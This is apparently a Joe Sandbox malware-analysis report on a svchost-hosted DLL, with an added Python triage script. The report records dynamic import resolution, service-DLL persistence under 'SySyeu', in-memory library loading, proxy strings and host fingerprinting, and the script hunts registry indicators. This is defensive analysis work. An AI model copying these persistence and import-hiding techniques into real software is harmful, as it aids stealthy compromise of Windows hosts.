• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                                                                                                • API String ID: 2238633743-588083535
                                                                                                                • Opcode ID: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                                                • Instruction ID: 67ebd5df9d46fa76e82372fdf0c3b5a8e4a25dc64441a3b0318b74b919e85c2a
                                                                                                                • Opcode Fuzzy Hash: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                                                • Instruction Fuzzy Hash: 212107B1D00228BBEB10EFA5DC44BEEBAFDEB48391F114126F911F2254DB7459408F64
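The function records above share one pattern: the DLL is loaded with LoadLibraryA and the registry (ADVAPI32), COM (Ole32/Oleaut32) and desktop (user32) routines are fetched by name with GetProcAddress, so none of them show up in the static import table, and the record that follows resolves IsWow64Process the same way. The strings of the 1000306C..1000310D record (the SYSTEM\CurrentControlSet\Services\%s path, the Default, Group, InstallTime and Remark names and the "%4d-%.2d-%.2d %.2d:%.2d" format) are the artifacts a hunter would look for. The Python script below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses trace lines in the format shown on this page, rebuilds the resolved-import table by pairing each GetProcAddress with the preceding LoadLibraryA, groups the names into capabilities, and turns the registry strings into a check over a constructed registry snapshot. It assumes the report's line format, assumes that the sample builds the InstallTime value by formatting GetLocalTime with the listed format string (the report shows the two calls and the string but not the wsprintfA arguments), and the service names in the snapshot are constructed.

```python
"""Triage helper for Joe Sandbox API-trace records (added example, not report code).

Rebuilds the dynamically resolved import table (LoadLibraryA + GetProcAddress),
maps it to capability groups, and turns the service-registry strings from the
report into a hunt over a registry snapshot.
"""
import re
from collections import OrderedDict

# Constructed input: trace lines copied verbatim from the function records above.
SAMPLE_TRACE = """
• LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
• GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
• GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
• GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
• GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
• GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
• FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
• wsprintfA.USER32 ref: 1000306C
• GetLocalTime.KERNEL32(?), ref: 100030D7
• LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000439A
• GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 100043AD
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 100043B8
• GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 100043C3
• GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100043D1
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 100043DB
• GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 100043E6
  • Part of subcall function 1000366A: LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
  • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
"""

# One report line: optional bullet, optional "Part of subcall function X:" prefix,
# API.MODULE, optional "(args)", then "ref: <call site>".
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.()]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_trace(text):
    """Return one dict per API line: api, module, argument list, call site, subcall."""
    calls = []
    for line in text.splitlines():
        m = TRACE_RE.match(line)
        if not m:
            continue  # section labels such as "APIs" or "Strings" carry no call
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": m.group("ref"), "subcall": m.group("sub")})
    return calls

def resolved_imports(calls):
    """Pair each GetProcAddress name with the DLL of the preceding LoadLibraryA.
    The report prints the module handle only as 00000000 or ?, so call order is the link."""
    table, current = OrderedDict(), None
    for c in calls:
        if c["api"] == "LoadLibraryA" and c["args"] and c["args"][0].lower().endswith(".dll"):
            current = c["args"][0].lower()
            table.setdefault(current, [])
        elif c["api"] == "GetProcAddress" and current and len(c["args"]) >= 2:
            name = c["args"][1]
            if name != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", name):
                table[current].append(name)
    return table

# Capability groups: a group counts only when every API in it was resolved.
CAPABILITIES = {
    "registry write/delete": {"RegCreateKeyExA", "RegSetValueExA", "RegDeleteKeyA", "RegDeleteValueA"},
    "registry enumeration": {"RegEnumKeyExA", "RegEnumValueA", "RegQueryValueExA"},
    "COM object creation": {"CoInitialize", "CoCreateInstance"},
    "desktop switching": {"GetThreadDesktop", "GetUserObjectInformationA", "SetThreadDesktop"},
    "WOW64 check": {"IsWow64Process"},
}

def capabilities(table):
    names = {n for lst in table.values() for n in lst}
    return sorted(cap for cap, need in CAPABILITIES.items() if need <= names)

# Strings listed for the 1000306C..1000310D record. ASSUMPTION: the sample fills
# InstallTime by formatting GetLocalTime with this string; the report shows the two
# calls and the string, not the wsprintfA arguments.
SERVICES_KEY_FMT = r"SYSTEM\CurrentControlSet\Services\%s"
INSTALL_TIME_FMT = "%4d-%.2d-%.2d %.2d:%.2d"
INSTALL_TIME_RE = re.compile(r"^ ?\d{4}-\d{2}-\d{2} \d{2}:\d{2}$")

def render_install_time(year, month, day, hour, minute):
    """Python's %-formatting honours %.2d like wsprintfA, so the shape is identical."""
    return INSTALL_TIME_FMT % (year, month, day, hour, minute)

def flag_service_keys(snapshot):
    """Flag services carrying the non-standard InstallTime/Remark values.
    'Group' and the default value are legitimate on real service keys, so they are
    not used as evidence on their own."""
    hits = []
    for name, values in snapshot.items():
        install = values.get("InstallTime", "")
        if "Remark" in values or INSTALL_TIME_RE.match(str(install)):
            hits.append(name)
    return hits

# Constructed registry snapshot (not from the report): one ordinary-looking service
# and one key shaped like the strings above, named after the report's String ID.
SAMPLE_SERVICES = {
    "Dhcp": {"Group": "TDI", "Start": 2},
    "SySyeu": {"Group": "Default", "InstallTime": render_install_time(2024, 10, 27, 9, 5),
               "Remark": "(constructed)"},
}

if __name__ == "__main__":
    table = resolved_imports(parse_trace(SAMPLE_TRACE))
    for dll, names in table.items():
        print(f"{dll}: {', '.join(names)}")
    print("capabilities:", capabilities(table))
    print("hunt:", SERVICES_KEY_FMT % "*", "->", flag_service_keys(SAMPLE_SERVICES))
```

Pairing by call order is the weak point: the report prints the LoadLibraryA return value as 00000000, so a GetProcAddress that belongs to a handle obtained elsewhere would be attributed to whichever DLL was loaded last in the trace; cross-check against the String ID line of the same record, which lists the DLL and function names together.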
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 100036D4
                                                                                                                • wsprintfA.USER32 ref: 100036F4
                                                                                                                • lstrlenA.KERNEL32(?,00000000), ref: 10003706
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • memset.MSVCRT ref: 10003738
                                                                                                                • getsockname.WS2_32(?,?,?), ref: 10003751
                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 10003764
                                                                                                                  • Part of subcall function 100035EA: lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                                                  • Part of subcall function 100035EA: gethostname.WS2_32(?,?), ref: 10003621
                                                                                                                • GetVersionExA.KERNEL32(?), ref: 10003792
                                                                                                                  • Part of subcall function 1000358C: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                                                  • Part of subcall function 1000358C: wsprintfA.USER32 ref: 100035DE
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 100037B0
                                                                                                                  • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                                                  • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                                                  • Part of subcall function 1000366A: LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                                                  • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                                                  • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                                                  • Part of subcall function 1000366A: FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                                                  • Part of subcall function 10003629: lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                                                  • Part of subcall function 10003629: lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                                                • lstrcpyA.KERNEL32(?,10006514), ref: 10003809
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$memset$Load$lstrlenmemcpy$??2@??3@Freelstrcpywsprintf$GlobalInfoMemoryStatusSystemVersiongethostnamegetsockname
                                                                                                                • String ID: @$Group$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 1875266911-862850364
                                                                                                                • Opcode ID: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                                                • Instruction ID: 3133a6343b416fd9d4de8abc7d75c938e5c6614370202d51db2fcbf0203c4673
                                                                                                                • Opcode Fuzzy Hash: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                                                • Instruction Fuzzy Hash: 2C41FDB690121CAAEB10DBA4CC49FCEB7BCEB08340F104496F609E7195DB74AB448FA1
                                                                                                                APIs
                                                                                                                • printf.MSVCRT ref: 100024B8
                                                                                                                • printf.MSVCRT ref: 100024C9
                                                                                                                • memset.MSVCRT ref: 100024FC
                                                                                                                • memcpy.MSVCRT(10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 10002505
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000250E
                                                                                                                • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000251B
                                                                                                                • printf.MSVCRT ref: 10002537
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002561
                                                                                                                • printf.MSVCRT ref: 10002573
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: printf$memcpy$??2@??3@memset
                                                                                                                • String ID: Can't load library from memory.$Loop_Proxy$OpenProxy$hmProxy!= NULL
                                                                                                                • API String ID: 60333908-620223428
                                                                                                                • Opcode ID: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                                                • Instruction ID: 34426b20c795a1564e6a7497d8f5fa3a22278249d6d1bd148d0ebd3529ec88d4
                                                                                                                • Opcode Fuzzy Hash: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                                                • Instruction Fuzzy Hash: 07112B76A045247FF200E7B0AD45FAF339ECB087D6F210026FA009605EEE756D0043A9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 10001E3C
                                                                                                                • wsprintfA.USER32 ref: 10001E7B
                                                                                                                  • Part of subcall function 10001B5B: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                                                  • Part of subcall function 10001B5B: _local_unwind2.MSVCRT ref: 10001BA9
                                                                                                                • wsprintfA.USER32 ref: 10001EAE
                                                                                                                • strlen.MSVCRT ref: 10001EBB
                                                                                                                  • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                                                  • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                                                • memset.MSVCRT ref: 10001EEE
                                                                                                                • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost), ref: 10001F02
                                                                                                                • lstrlenA.KERNEL32(?,00000001), ref: 10001F0B
                                                                                                                  • Part of subcall function 10001A43: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,SySyeu,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A54
                                                                                                                  • Part of subcall function 10001A43: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A69
                                                                                                                  • Part of subcall function 10001A43: StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A7A
                                                                                                                  • Part of subcall function 10001A43: GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A84
                                                                                                                  • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A92
                                                                                                                  • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AC2
                                                                                                                Strings
                                                                                                                • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10001EA8
                                                                                                                • ServiceDll, xrefs: 10001ED2
                                                                                                                • %%SystemRoot%%\System32\svchost.exe -k "%s", xrefs: 10001E6F
                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001EFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Service$Open$CloseHandleLibraryManagerwsprintf$ErrorFreeH_prologLastLoadStart_local_unwind2lstrcpylstrlenmemsetstrlen
                                                                                                                • String ID: %%SystemRoot%%\System32\svchost.exe -k "%s"$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                                                • API String ID: 1573142492-3522277913
                                                                                                                • Opcode ID: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                                                • Instruction ID: b0e3a08bed4d5a752cfc5ae4754fd9917613b9386cafdbad90e7966b10716f67
                                                                                                                • Opcode Fuzzy Hash: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                                                • Instruction Fuzzy Hash: D9217EB290011CBBEB10DF94DC86EEF7B7DEB48780F104069FA08A2145EB715F558BA6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                                                  • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                                                  • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                                                  • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                                                  • Part of subcall function 100020C8: GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                                                  • Part of subcall function 100020C8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                                                  • Part of subcall function 100020C8: GetTickCount.KERNEL32 ref: 100020F9
                                                                                                                  • Part of subcall function 100020C8: wsprintfA.USER32 ref: 10002113
                                                                                                                  • Part of subcall function 100020C8: MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                                                  • Part of subcall function 100020C8: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                                                • wsprintfA.USER32 ref: 10002FC4
                                                                                                                • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002FE7
                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104), ref: 10002FFF
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1000300C
                                                                                                                • GetLastError.KERNEL32 ref: 10003018
                                                                                                                • Sleep.KERNEL32(000003E8), ref: 10003028
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10003035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileService$AttributesCloseHandleModuleMoveNameOpenQuerySleepStatuswsprintf$ControlCountCreateDirectoryErrorLastManagerProcessSystemTick
                                                                                                                • String ID: D$GUpdate%s$SySyeu$WinSta0\Default
                                                                                                                • API String ID: 3185690247-1592408275
                                                                                                                • Opcode ID: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                                                • Instruction ID: ebf8a919204883b3cf295611002b4e487a781f5c3db184b4aeea1269bd5b3cbf
                                                                                                                • Opcode Fuzzy Hash: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                                                • Instruction Fuzzy Hash: EB11B672401269AFFB11DBA0CC45EDF37BEFF09381F204051F506E2098DBB49A088BA1
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10004750
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10004764
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000476E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10004779
                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 100047B1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100047D0
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 100047DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                 • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                 • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                                                • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 1314729832-4285911020
                                                                                                                • Opcode ID: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                                                • Instruction ID: 62e2a4d820bdf17ee503cc2422b7b88c1aaff87933f8729642c2e5364a3b347a
                                                                                                                • Opcode Fuzzy Hash: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                                                • Instruction Fuzzy Hash: F3115E71D01228ABFB10DB618C88FEEBBF8EF497C1F110095E904E2144DB75AA408AA4
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,1000397D), ref: 10003BC4
• GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10003BD3
• LoadLibraryA.KERNEL32(?,?,?,?,1000397D), ref: 10003C0D
• realloc.MSVCRT ref: 10003C2C
• GetProcAddress.KERNEL32(?,?), ref: 10003C85
• FreeLibrary.KERNEL32(?,1000397D), ref: 10003CC7
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: Library$AddressLoadProc$Freerealloc
• String ID: IsBadReadPtr$kernel32.dll
• API String ID: 343009874-2271619998
• Opcode ID: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
• Instruction ID: afc84e2e1f51588ee312ba66ad041d110bb41dc23133337ce681a0c6c223f4ac
• Opcode Fuzzy Hash: 449202d9bcd9b40c7640628575b91c895d67466b70a0093317474b01c75d12b5
• Instruction Fuzzy Hash: 45410571A0021AABFB51CF64C889B9EBBF8FF04395F118069E905E7259D735EE44CB90
APIs
• memcpy.MSVCRT(?,?,00000170), ref: 100029D2
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10002A05
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002A28
• CloseHandle.KERNEL32(00000000), ref: 10002A3A
• strlen.MSVCRT ref: 10002A47
• wsprintfA.USER32 ref: 10002A6B
• lstrcpyA.KERNEL32(?,?), ref: 10002A84
  • Part of subcall function 100027BC: memset.MSVCRT ref: 100027D8
  • Part of subcall function 100027BC: strrchr.MSVCRT ref: 100027E2
  • Part of subcall function 100027BC: strrchr.MSVCRT ref: 10002811
  • Part of subcall function 100027BC: strlen.MSVCRT ref: 10002821
  • Part of subcall function 100027BC: strncpy.MSVCRT ref: 1000283B
  • Part of subcall function 100027BC: memset.MSVCRT ref: 10002889
  • Part of subcall function 100027BC: wsprintfA.USER32 ref: 100028A4
  • Part of subcall function 100027BC: memset.MSVCRT ref: 100028B3
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
